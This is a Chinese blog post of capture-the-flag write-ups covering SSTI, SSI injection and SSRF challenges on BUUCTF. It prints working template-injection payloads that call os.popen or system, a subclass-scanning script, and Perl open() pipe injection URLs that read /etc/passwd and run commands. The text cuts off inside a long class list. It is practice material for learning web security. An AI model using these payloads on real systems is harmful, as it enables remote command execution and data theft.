buu(ssti模板注入、ssrf服务器请求伪造)

已于 2022-10-24 21:14:54 修改
阅读量970 收藏
点赞数
文章标签: 服务器 spring 运维 1024程序员节
于 2022-08-19 22:51:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/126378895
版权

目录

目录

[CISCN2019 华东南赛区]Web11

[BJDCTF2020]EasySearch

[De1CTF 2019]SSRF Me

[CSCCTF 2019 Qual]FlaskLight

模板注入过滤 globals,拼接绕过

[HITCON 2017]SSRFme

[RootersCTF2019]I_<3_Flask

运用Arjun软件,获得传参名字​编辑

二个方法都可以  lipsum

[CISCN2019 华东南赛区]Web11

打开界面,好熟悉可能是做过一道类似的题,是通过ip进行注入的题目

 最下面给出了smarty模板注入

会随着我的x-Forwarded-for的改变而改变,用if标签

{if system('cat /flag')}{/if} 

 

[BJDCTF2020]EasySearch

 打开界面源码,什么都没有发现,试一下万能密码之类的登录,只返回fail

那么尝试一下扫目录,发现index.php.swp然后访问

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***

发现页面源码,看完代码,只要密码经过md5加密的前六位6d0bc1相同,便可成功登陆

那么构建脚本

import hashlib
for i in range(1,100000000000):
    md5=hashlib.md5(str(i).encode('utf_8')).hexdigest()   //hexdigest十六位的意思
    if md5[0:6]=="6d0bc1":
        print(str(i)+'$'+md5)

 2020666

 抓包发现一个url访问一下

 

 一般这种界面都存在ssti注入,可能是cxk或者ip那里,

搜索一下,shtml的信息,补充一下什么是ssi注入,SSI 注入全称Server-Side Includes Injection(服务端包含注入),ssi可以赋予html静态页面的动态效果,通过ssi执行命令,返回对应的结果,当在网站目录中发现了.stm .shtm .shtml或在界面中发现了

<div>{$what}</div>

<p>Welcome, {{username}}</p> <div>{%$a%}</div>

就容易产生ssi注入,此处问题的其注入格式为:<!--#exec cmd="命令" -->。
username=<!--#exec cmd="ls ../"-->&password=2020666

[De1CTF 2019]SSRF Me

打开界面,整理一下python源码,表面是一道ssrf题,其实是一道python flash框架审计题

#! /usr/bin/env python
# #encoding=utf-8
from flask import Flask
from flask import request
import socket
import hashlib
import urllib
import sys
import os
import json
reload(sys)
sys.setdefaultencoding('latin1')
 
app = Flask(__name__)
 
secert_key = os.urandom(16)
 
class Task:
    def __init__(self, action, param, sign, ip):
        self.action = action
        self.param = param
        self.sign = sign
        self.sandbox = md5(ip)
        if(not os.path.exists(self.sandbox)):
            os.mkdir(self.sandbox)
 
    def Exec(self):
        result = {}
        result['code'] = 500
        if (self.checkSign()):
            if "scan" in self.action:
                tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
                resp = scan(self.param)
                if (resp == "Connection Timeout"):
                    result['data'] = resp
                else:
                    print resp
                    tmpfile.write(resp)
                    tmpfile.close()
                result['code'] = 200
            if "read" in self.action:
                f = open("./%s/result.txt" % self.sandbox, 'r')
                result['code'] = 200
                result['data'] = f.read()
            if result['code'] == 500:
                result['data'] = "Action Error"
        else:
            result['code'] = 500
            result['msg'] = "Sign Error"
        return result
 
    def checkSign(self):
        if (getSign(self.action, self.param) == self.sign):
            return True
        else:
            return False
 
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
    param = urllib.unquote(request.args.get("param", ""))
    action = "scan"
    return getSign(action, param)
 
@app.route('/De1ta',methods=['GET','POST'])
def challenge():
    action = urllib.unquote(request.cookies.get("action"))
    param = urllib.unquote(request.args.get("param", ""))
    sign = urllib.unquote(request.cookies.get("sign"))
    ip = request.remote_addr
    if(waf(param)):
        return "No Hacker!!!!"
    task = Task(action, param, sign, ip)
    return json.dumps(task.Exec())
 
@app.route('/')
def index():
    return open("code.txt","r").read()
 
def scan(param):
    socket.setdefaulttimeout(1)
    try:
        return urllib.urlopen(param).read()[:50]
    except:
        return "Connection Timeout"
 
def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()
 
def md5(content):
    return hashlib.md5(content).hexdigest()
 
def waf(param):
    check=param.strip().lower()
    if check.startswith("gopher") or check.startswith("file"):
        return True
    else:
        return False
if __name__ == '__main__':
    app.debug = False
    app.run(host='0.0.0.0',port=9999)

首先有三个路由选择的路径

@app.route("/geneSign", methods=['GET', 'POST'])

@app.route('/De1ta',methods=['GET','POST'])

@app.route('/')

 我们一个个看功能, 

@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
    param = urllib.unquote(request.args.get("param", ""))
    action = "scan"
    return getSign(action, param)

这里get传参一个param值和action一起进入getSign函数

def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()

getSign,功能是返回一个   secert_key +param+action    md5加密十六位的值,里面secertkey不确定,param是get传参进去可修改,action其实就是‘scan’字符串

@app.route('/De1ta',methods=['GET','POST'])
def challenge():
    action = urllib.unquote(request.cookies.get("action"))
    param = urllib.unquote(request.args.get("param", ""))
    sign = urllib.unquote(request.cookies.get("sign"))
    ip = request.remote_addr
    if(waf(param)):
        return "No Hacker!!!!"
    task = Task(action, param, sign, ip)
    return json.dumps(task.Exec())

这个De1ta路由时核心重点,action和sign时通过cookie确定,param依然是get传参,ip还是本地ip,waf函数看一下功能

def waf(param):
    check=param.strip().lower()
    if check.startswith("gopher") or check.startswith("file"):
        return True
    else:
        return False 

strip去掉首位空格,lower小写,startswitch()匹配字符串第一个是否为参数中的值 ,等于过滤了gopher和file协议

task = Task(action, param, sign, ip)
    return json.dumps(task.Exec())继续看这里,task实例化对象,调用exec函数

def Exec(self):
        result = {}
        result['code'] = 500
        if (self.checkSign()):
            if "scan" in self.action:
                tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
                resp = scan(self.param)
                if (resp == "Connection Timeout"):
                    result['data'] = resp
                else:
                    print resp
                    tmpfile.write(resp)
                    tmpfile.close()
                result['code'] = 200
            if "read" in self.action:
                f = open("./%s/result.txt" % self.sandbox, 'r')
                result['code'] = 200
                result['data'] = f.read()
            if result['code'] == 500:
                result['data'] = "Action Error"
        else:
            result['code'] = 500
            result['msg'] = "Sign Error"
        return result

直接看Exec第一步需要绕过self.checkSign,

def checkSign(self):
        if (getSign(self.action, self.param) == self.sign):
            return True
        else:
            return False

 看见调用函数getSign和sign值,相同就可以,然后getsign时返回一个md5加密后的值

def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()

继续往下看, 

if "scan" in self.action:

 if "read" in self.action:

这里我们大致就可以猜出,action中的值时scanread 或者readscan这样就可以执行下面的函数

resp = scan(self.param)

def scan(param):
    socket.setdefaulttimeout(1)
    try:
        return urllib.urlopen(param).read()[:50]
    except:
        return "Connection Timeout"

就可以读取文件,题目中给出了flag在./flag.txt文件中,param的值,一定是/flag.txt

到这分析结束,我们只要绕过checkSign,让返回的值相同就可以了,可是secret这个密钥我们不知道值呀,仔细看第一个目录就可以明白

@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
    param = urllib.unquote(request.args.get("param", ""))
    action = "scan"
    return getSign(action, param)

def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()

action赋值了scan,我们第二个关键目录中的action的值肯定是 readscan或者scanread

而这里 (secert_key + param + ‘scan’)  param里面肯定是flag的位置上面和下面就差一个read,我们完全可以 param传参flag.txtread就可以获得值了

记住是在/geneSign   url下面

响应码500,服务器端错误,还以为我错了,然后直接打出cookie,正确欧克 

 action赋值readscan,那是因为要和上面一致,所以不用scanread,终于做出来了,不容易!!!

[CSCCTF 2019 Qual]FlaskLight

模板注入过滤 globals,拼接绕过

看题目感觉是一道flask模板注入的题

查看源码

然后通过get方法上传search

确定这是一道模板注入,然后寻找可利用的类

#查找可以利用的类
import requests
import time

# 可利用类的字典
list = ["site._Printer", "site.Quitter", "warnings.catch_warnings", "os._wrap_close", "popen", "Popen"]

for i in range(0, 1000):
    url = "http://10a6d289-f0c8-4c5b-8184-9d5e0db669ce.node4.buuoj.cn:81/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
    time.sleep(0.1)
    r = requests.get(url)
    # print(res)
    # print(r.text)
    # print(r.text)
    for j in list:
        if j in r.text:
            print(i)
            print(j)
            break

 

例一:warnings.catch_warnings 

 首先利用第一个类

{{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

因为globals报错,500,所以改为字符串链接, 

例二:
class’site._Printer’类

{{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls').read()}}

 发现flasklight,没有flag那么应该在这里面,获得flag

{{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('cat /flasklight/coomme_geeeett_youur_flek').read()}}

[HITCON 2017]SSRFme

?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {   //获得ip地址
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
           //explode就是当中,分割为部分
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"]; 其实这个也是一个ip地址的表达方式

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
//建立一个沙箱地址为/sandbox,然后以orange和ip地址的md5进行链接
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
//使用get传入一个参数但是需要进行escapeshellarg过滤

    $info = pathinfo($_GET["filename"]);  不包含后缀的文件名

    $dir  = str_replace(".", "", basename($info["dirname"])); 目录路径
    //就是禁止使用../因为替换掉了.
     dirname获得文件名
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
     往文件中填入 data
    highlight_file(__FILE__);

这里需要了解一下PHP pathinfo() 函数

  • [dirname]: 目录路径
  • [basename]: 文件名
  • [extension]: 文件后缀名
  • [filename]: 不包含后缀的文件名

 这道题也是获得了一个知识点即get中的open函数漏洞

当我们使用

open函数在GET命令被调用时执行,也就是第五行执行GET命令时,perl语言会调用open命令,漏洞就存在于open命令对于文件的处理上,关于这个漏洞,perl函数看到要打开的文件名中如果以管道符(键盘上那个竖杠)结尾,就会中断原有打开文件操作,并且把这个文件名当作一个命令来执行,并且将命令的执行结果作为这个文件的内容写入。这个命令的执行权限是当前的登录者。如果你执行这个命令,你会看到perl程序运行的结果。

因此,我们可以构造这样的payload:
首先:
url=【任意】&filename=cat /flag|

但前提是我们存在这样一个执行命令的文件
如下所示: 

 然后MD5(orange+ip)

然后通过目录 进行文件的访问,发现构建文件成功

然后就可以通过命令写入文件

?url=cat /flag|&filename=123.txt

/sandbox/2eeed2f9aeae6311b507ada8fb98809e/cat%20/flag%7C

呃呃呃呃呃呃,接下来需要反弹技术了 我赶紧去学

首先我们可以查看系统文件输出到文件中

http://117.50.3.97:8004/?url=/etc/passwd&filename=111  //默认配置文件目录
http://117.50.3.97:8004/sandbox/9872edb0e32d04659381b860b130a2b7/111  然后访问该目录

然后读取根目录,可以看到flag文件和readflag文件

 看到有flag文件和readflag文件,原题是直接可以读取flag,在buu上要通过运行readflag读取文件,所以我们继续往下分析。

2.创建与命令执行相同的文件。

/?url=file:bash -c /readflag|&filename=bash -c /readflag|

这样我们就创造了一个与命令相同的文件

因为由open漏洞的原理,我们使用file:协议然后运行到|就可以执行了

bash -c其实意义就是执行后面的

3.修改存储的文件,并读取flag输入到存储的文件中去。直接rce。


/?url=file:bash -c /readflag|&filename=1455

[RootersCTF2019]I_<3_Flask

运用Arjun软件,获得传参名字

 打开界面,看题目肯定是一个模板注入,所以肯定需要注入点

 - m指定方法   -c 控制参数大小

发现名字是get传参,name

{{''.__class__.__bases__[0].__subclasses__()}}查看子模块

all_list = "<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'dict_reversekeyiterator'>, <class 'dict_reversevalueiterator'>, <class 'dict_reverseitemiterator'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>, <class 'instancemethod'>, <class 'classmethod_descriptor'>, <class 'method_descriptor'>, <class 'callable_iterator'>, <class 'iterator'>, <class 'pickle.PickleBuffer'>, <class 'coroutine'>, <class 'coroutine_wrapper'>, <class 'InterpreterID'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'BaseException'>, <class 'hamt'>, <class 'hamt_array_node'>, <class 'hamt_bitmap_node'>, <class 'hamt_collision_node'>, <class 'keys'>, <class 'values'>, <class 'items'>, <class 'Context'>, <class 'ContextVar'>, <class 'Token'>, <class 'Token.MISSING'>, <class 'moduledef'>, <class 'module'>, <class 'filter'>, <class 'map'>, <class 'zip'>, <class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib.BuiltinImporter'>, <class 'classmethod'>, <class '_frozen_importlib.FrozenImporter'>, <class '_frozen_importlib._ImportLockContext'>, <class '_thread._localdummy'>, <class '_thread._local'>, <class '_thread.lock'>, <class '_thread.RLock'>, <class '_frozen_importlib_external.WindowsRegistryFinder'>, <class '_frozen_importlib_external._LoaderBasics'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.PathFinder'>, <class '_frozen_importlib_external.FileFinder'>, <class '_io._IOBase'>, <class '_io._BytesIOBuffer'>, <class '_io.IncrementalNewlineDecoder'>, <class 'posix.ScandirIterator'>, <class 'posix.DirEntry'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.Codec'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class '_abc_data'>, <class 'abc.ABC'>, <class 'dict_itemiterator'>, <class 'collections.abc.Hashable'>, <class 'collections.abc.Awaitable'>, <class 'collections.abc.AsyncIterable'>, <class 'async_generator'>, <class 'collections.abc.Iterable'>, <class 'bytes_iterator'>, <class 'bytearray_iterator'>, <class 'dict_keyiterator'>, <class 'dict_valueiterator'>, <class 'list_iterator'>, <class 'list_reverseiterator'>, <class 'range_iterator'>, <class 'set_iterator'>, <class 'str_iterator'>, <class 'tuple_iterator'>, <class 'collections.abc.Sized'>, <class 'collections.abc.Container'>, <class 'collections.abc.Callable'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>, <class 'types.DynamicClassAttribute'>, <class 'types._GeneratorWrapper'>, <class 'enum.auto'>, <enum 'Enum'>, <class 're.Pattern'>, <class 're.Match'>, <class '_sre.SRE_Scanner'>, <class 'sre_parse.State'>, <class 'sre_parse.SubPattern'>, <class 'sre_parse.Tokenizer'>, <class 'operator.itemgetter'>, <class 'operator.attrgetter'>, <class 'operator.methodcaller'>, <class 'itertools.accumulate'>, <class 'itertools.combinations'>, <class 'itertools.combinations_with_replacement'>, <class 'itertools.cycle'>, <class 'itertools.dropwhile'>, <class 'itertools.takewhile'>, <class 'itertools.islice'>, <class 'itertools.starmap'>, <class 'itertools.chain'>, <class 'itertools.compress'>, <class 'itertools.filterfalse'>, <class 'itertools.count'>, <class 'itertools.zip_longest'>, <class 'itertools.permutations'>, <class 'itertools.product'>, <class 'itertools.repeat'>, <class 'itertools.groupby'>, <class 'itertools._grouper'>, <class 'itertools._tee'>, <class 'itertools._tee_dataobject'>, <class 'reprlib.Repr'>, <class 'collections.deque'>, <class '_collections._deque_iterator'>, <class '_collections._deque_reverse_iterator'>, <class '_collections._tuplegetter'>, <class 'collections._Link'>, <class 'functools.partial'>, <class 'functools._lru_cache_wrapper'>, <class 'functools.partialmethod'>, <class 'functools.singledispatchmethod'>, <class 'functools.cached_property'>, <class 're.Scanner'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class 'importlib.abc.Finder'>, <class 'importlib.abc.Loader'>, <class 'importlib.abc.ResourceReader'>, <class 'contextlib.ContextDecorator'>, <class 'contextlib._GeneratorContextManagerBase'>, <class 'contextlib._BaseExitStack'>, <class 'tokenize.Untokenizer'>, <class 'traceback.FrameSummary'>, <class 'traceback.TracebackException'>, <class '_ast.AST'>, <class 'ast.NodeVisitor'>, <class 'CArgObject'>, <class '_ctypes.CThunkObject'>, <class '_ctypes._CData'>, <class '_ctypes.CField'>, <class '_ctypes.DictRemover'>, <class '_ctypes.StructParam_Type'>, <class 'Struct'>, <class 'unpack_iterator'>, <class 'ctypes.CDLL'>, <class 'ctypes.LibraryLoader'>, <class 'zlib.Compress'>, <class 'zlib.Decompress'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class 'threading._RLock'>, <class 'threading.Condition'>, <class 'threading.Semaphore'>, <class 'threading.Event'>, <class 'threading.Barrier'>, <class 'threading.Thread'>, <class '_bz2.BZ2Compressor'>, <class '_bz2.BZ2Decompressor'>, <class '_lzma.LZMACompressor'>, <class '_lzma.LZMADecompressor'>, <class 'select.poll'>, <class 'select.epoll'>, <class 'selectors.BaseSelector'>, <class 'subprocess.CompletedProcess'>, <class 'subprocess.Popen'>, <class '_sha512.sha384'>, <class '_sha512.sha512'>, <class '_random.Random'>, <class 'weakref.finalize._Info'>, <class 'weakref.finalize'>, <class 'tempfile._RandomNameSequence'>, <class 'tempfile._TemporaryFileCloser'>, <class 'tempfile._TemporaryFileWrapper'>, <class 'tempfile.SpooledTemporaryFile'>, <class 'tempfile.TemporaryDirectory'>, <class '_socket.socket'>, <class 'datetime.timedelta'>, <class 'datetime.date'>, <class 'datetime.tzinfo'>, <class 'datetime.time'>, <class 'datetime.date'>, <class 'datetime.timedelta'>, <class 'datetime.time'>, <class 'datetime.tzinfo'>, <class 'urllib.parse._ResultMixinStr'>, <class 'urllib.parse._ResultMixinBytes'>, <class 'urllib.parse._NetlocResultMixinBase'>, <class 'calendar._localized_month'>, <class 'calendar._localized_day'>, <class 'calendar.Calendar'>, <class 'calendar.different_locale'>, <class 'email._parseaddr.AddrlistClass'>, <class 'string.Template'>, <class 'string.Formatter'>, <class 'email.charset.Charset'>, <class 'dis.Bytecode'>, <class 'inspect.BlockFinder'>, <class 'inspect._void'>, <class 'inspect._empty'>, <class 'inspect.Parameter'>, <class 'inspect.BoundArguments'>, <class 'inspect.Signature'>, <class 'logging.LogRecord'>, <class 'logging.PercentStyle'>, <class 'logging.Formatter'>, <class 'logging.BufferingFormatter'>, <class 'logging.Filter'>, <class 'logging.Filterer'>, <class 'logging.PlaceHolder'>, <class 'logging.Manager'>, <class 'logging.LoggerAdapter'>, <class 'textwrap.TextWrapper'>, <class '__future__._Feature'>, <class 'zipfile.ZipInfo'>, <class 'zipfile.LZMACompressor'>, <class 'zipfile.LZMADecompressor'>, <class 'zipfile._SharedFile'>, <class 'zipfile._Tellable'>, <class 'zipfile.ZipFile'>, <class 'zipfile.Path'>, <class 'pkgutil.ImpImporter'>, <class 'pkgutil.ImpLoader'>, <class 'pyexpat.xmlparser'>, <class 'plistlib.Data'>, <class 'plistlib.UID'>, <class 'plistlib._PlistParser'>, <class 'plistlib._DumbXMLWriter'>, <class 'plistlib._BinaryPlistParser'>, <class 'plistlib._BinaryPlistWriter'>, <class 'email.header.Header'>, <class 'email.header._ValueFormatter'>, <class 'email._policybase._PolicyBase'>, <class 'email.feedparser.BufferedSubFile'>, <class 'email.feedparser.FeedParser'>, <class 'email.parser.Parser'>, <class 'email.parser.BytesParser'>, <class 'pkg_resources.extern.VendorImporter'>, <class 'pkg_resources._vendor.six._LazyDescr'>, <class 'pkg_resources._vendor.six._SixMetaPathImporter'>, <class 'pkg_resources._vendor.six._LazyDescr'>, <class 'pkg_resources._vendor.six._SixMetaPathImporter'>, <class 'pkg_resources._vendor.appdirs.AppDirs'>, <class 'pkg_resources.extern.packaging._structures.Infinity'>, <class 'pkg_resources.extern.packaging._structures.NegativeInfinity'>, <class 'pkg_resources.extern.packaging.version._BaseVersion'>, <class 'pkg_resources.extern.packaging.specifiers.BaseSpecifier'>, <class 'pprint._safe_key'>, <class 'pprint.PrettyPrinter'>, <class 'pkg_resources._vendor.pyparsing._Constants'>, <class 'pkg_resources._vendor.pyparsing._ParseResultsWithOffset'>, <class 'pkg_resources._vendor.pyparsing.ParseResults'>, <class 'pkg_resources._vendor.pyparsing.ParserElement._UnboundedCache'>, <class 'pkg_resources._vendor.pyparsing.ParserElement._FifoCache'>, <class 'pkg_resources._vendor.pyparsing.ParserElement'>, <class 'pkg_resources._vendor.pyparsing._NullToken'>, <class 'pkg_resources._vendor.pyparsing.OnlyOnce'>, <class 'pkg_resources._vendor.pyparsing.pyparsing_common'>, <class 'pkg_resources.extern.packaging.markers.Node'>, <class 'pkg_resources.extern.packaging.markers.Marker'>, <class 'pkg_resources.extern.packaging.requirements.Requirement'>, <class 'pkg_resources.IMetadataProvider'>, <class 'pkg_resources.WorkingSet'>, <class 'pkg_resources.Environment'>, <class 'pkg_resources.ResourceManager'>, <class 'pkg_resources.NullProvider'>, <class 'pkg_resources.NoDists'>, <class 'pkg_resources.EntryPoint'>, <class 'pkg_resources.Distribution'>, <class 'gunicorn.pidfile.Pidfile'>, <class 'gunicorn.sock.BaseSocket'>, <class 'gunicorn.arbiter.Arbiter'>, <class 'gettext.NullTranslations'>, <class 'argparse._AttributeHolder'>, <class 'argparse.HelpFormatter._Section'>, <class 'argparse.HelpFormatter'>, <class 'argparse.FileType'>, <class 'argparse._ActionsContainer'>, <class 'shlex.shlex'>, <class '_ssl._SSLContext'>, <class '_ssl._SSLSocket'>, <class '_ssl.MemoryBIO'>, <class '_ssl.Session'>, <class 'ssl.SSLObject'>, <class 'gunicorn.reloader.InotifyReloader'>, <class 'gunicorn.config.Config'>, <class 'gunicorn.config.Setting'>, <class 'gunicorn.debug.Spew'>, <class 'gunicorn.app.base.BaseApplication'>, <class '_pickle.Unpickler'>, <class '_pickle.Pickler'>, <class '_pickle.Pdata'>, <class '_pickle.PicklerMemoProxy'>, <class '_pickle.UnpicklerMemoProxy'>, <class 'pickle._Framer'>, <class 'pickle._Unframer'>, <class 'pickle._Pickler'>, <class 'pickle._Unpickler'>, <class '_queue.SimpleQueue'>, <class 'queue.Queue'>, <class 'queue._PySimpleQueue'>, <class 'logging.handlers.QueueListener'>, <class 'socketserver.BaseServer'>, <class 'socketserver.ForkingMixIn'>, <class 'socketserver.ThreadingMixIn'>, <class 'socketserver.BaseRequestHandler'>, <class 'logging.config.ConvertingMixin'>, <class 'logging.config.BaseConfigurator'>, <class 'gunicorn.glogging.Logger'>, <class 'gunicorn.http.unreader.Unreader'>, <class 'gunicorn.http.body.ChunkedReader'>, <class 'gunicorn.http.body.LengthReader'>, <class 'gunicorn.http.body.EOFReader'>, <class 'gunicorn.http.body.Body'>, <class 'gunicorn.http.message.Message'>, <class 'gunicorn.http.parser.Parser'>, <class 'gunicorn.http.wsgi.FileWrapper'>, <class 'gunicorn.http.wsgi.Response'>, <class 'gunicorn.workers.workertmp.WorkerTmp'>, <class 'gunicorn.workers.base.Worker'>, <class 'markupsafe._MarkupEscapeHelper'>, <class '_hashlib.HASH'>, <class '_blake2.blake2b'>, <class '_blake2.blake2s'>, <class '_sha3.sha3_224'>, <class '_sha3.sha3_256'>, <class '_sha3.sha3_384'>, <class '_sha3.sha3_512'>, <class '_sha3.shake_128'>, <class '_sha3.shake_256'>, <class '_json.Scanner'>, <class '_json.Encoder'>, <class 'json.decoder.JSONDecoder'>, <class 'json.encoder.JSONEncoder'>, <class 'jinja2.utils.MissingType'>, <class 'jinja2.utils.LRUCache'>, <class 'jinja2.utils.Cycler'>, <class 'jinja2.utils.Joiner'>, <class 'jinja2.utils.Namespace'>, <class 'jinja2.bccache.Bucket'>, <class 'jinja2.bccache.BytecodeCache'>, <class 'jinja2.nodes.EvalContext'>, <class 'jinja2.nodes.Node'>, <class 'jinja2.visitor.NodeVisitor'>, <class 'jinja2.idtracking.Symbols'>, <class 'jinja2.compiler.MacroRef'>, <class 'jinja2.compiler.Frame'>, <class 'jinja2.runtime.TemplateReference'>, <class 'jinja2.runtime.Context'>, <class 'jinja2.runtime.BlockReference'>, <class 'jinja2.runtime.LoopContext'>, <class 'jinja2.runtime.Macro'>, <class 'jinja2.runtime.Undefined'>, <class 'decimal.Decimal'>, <class 'decimal.Context'>, <class 'decimal.SignalDictMixin'>, <class 'decimal.ContextManager'>, <class 'numbers.Number'>, <class 'jinja2.lexer.Failure'>, <class 'jinja2.lexer.TokenStreamIterator'>, <class 'jinja2.lexer.TokenStream'>, <class 'jinja2.lexer.Lexer'>, <class 'jinja2.parser.Parser'>, <class 'jinja2.environment.Environment'>, <class 'jinja2.environment.Template'>, <class 'jinja2.environment.TemplateModule'>, <class 'jinja2.environment.TemplateExpression'>, <class 'jinja2.environment.TemplateStream'>, <class 'jinja2.loaders.BaseLoader'>, <class 'werkzeug._internal._Missing'>, <class 'werkzeug._internal._DictAccessorProperty'>, <class 'werkzeug.utils.HTMLBuilder'>, <class 'werkzeug.exceptions.Aborter'>, <class 'werkzeug.urls.Href'>, <class 'email.message.Message'>, <class 'http.client.HTTPConnection'>, <class 'mimetypes.MimeTypes'>, <class 'click._compat._FixupStream'>, <class 'click._compat._AtomicFile'>, <class 'click.utils.LazyFile'>, <class 'click.utils.KeepOpenFile'>, <class 'click.utils.PacifyFlushWrapper'>, <class 'click.parser.Option'>, <class 'click.parser.Argument'>, <class 'click.parser.ParsingState'>, <class 'click.parser.OptionParser'>, <class 'click.types.ParamType'>, <class 'click.formatting.HelpFormatter'>, <class 'click.core.Context'>, <class 'click.core.BaseCommand'>, <class 'click.core.Parameter'>, <class 'werkzeug.serving.WSGIRequestHandler'>, <class 'werkzeug.serving._SSLContext'>, <class 'werkzeug.serving.BaseWSGIServer'>, <class 'werkzeug.datastructures.ImmutableListMixin'>, <class 'werkzeug.datastructures.ImmutableDictMixin'>, <class 'werkzeug.datastructures.UpdateDictMixin'>, <class 'werkzeug.datastructures.ViewItems'>, <class 'werkzeug.datastructures._omd_bucket'>, <class 'werkzeug.datastructures.Headers'>, <class 'werkzeug.datastructures.ImmutableHeadersMixin'>, <class 'werkzeug.datastructures.IfRange'>, <class 'werkzeug.datastructures.Range'>, <class 'werkzeug.datastructures.ContentRange'>, <class 'werkzeug.datastructures.FileStorage'>, <class 'urllib.request.Request'>, <class 'urllib.request.OpenerDirector'>, <class 'urllib.request.BaseHandler'>, <class 'urllib.request.HTTPPasswordMgr'>, <class 'urllib.request.AbstractBasicAuthHandler'>, <class 'urllib.request.AbstractDigestAuthHandler'>, <class 'urllib.request.URLopener'>, <class 'urllib.request.ftpwrapper'>, <class 'werkzeug.wrappers.accept.AcceptMixin'>, <class 'werkzeug.wrappers.auth.AuthorizationMixin'>, <class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'>, <class 'werkzeug.wsgi.ClosingIterator'>, <class 'werkzeug.wsgi.FileWrapper'>, <class 'werkzeug.wsgi._RangeWrapper'>, <class 'werkzeug.formparser.FormDataParser'>, <class 'werkzeug.formparser.MultiPartParser'>, <class 'werkzeug.wrappers.base_request.BaseRequest'>, <class 'werkzeug.wrappers.base_response.BaseResponse'>, <class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'>, <class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'>, <class 'werkzeug.wrappers.etag.ETagRequestMixin'>, <class 'werkzeug.wrappers.etag.ETagResponseMixin'>, <class 'werkzeug.wrappers.cors.CORSRequestMixin'>, <class 'werkzeug.wrappers.cors.CORSResponseMixin'>, <class 'werkzeug.useragents.UserAgentParser'>, <class 'werkzeug.useragents.UserAgent'>, <class 'werkzeug.wrappers.user_agent.UserAgentMixin'>, <class 'werkzeug.wrappers.request.StreamOnlyMixin'>, <class 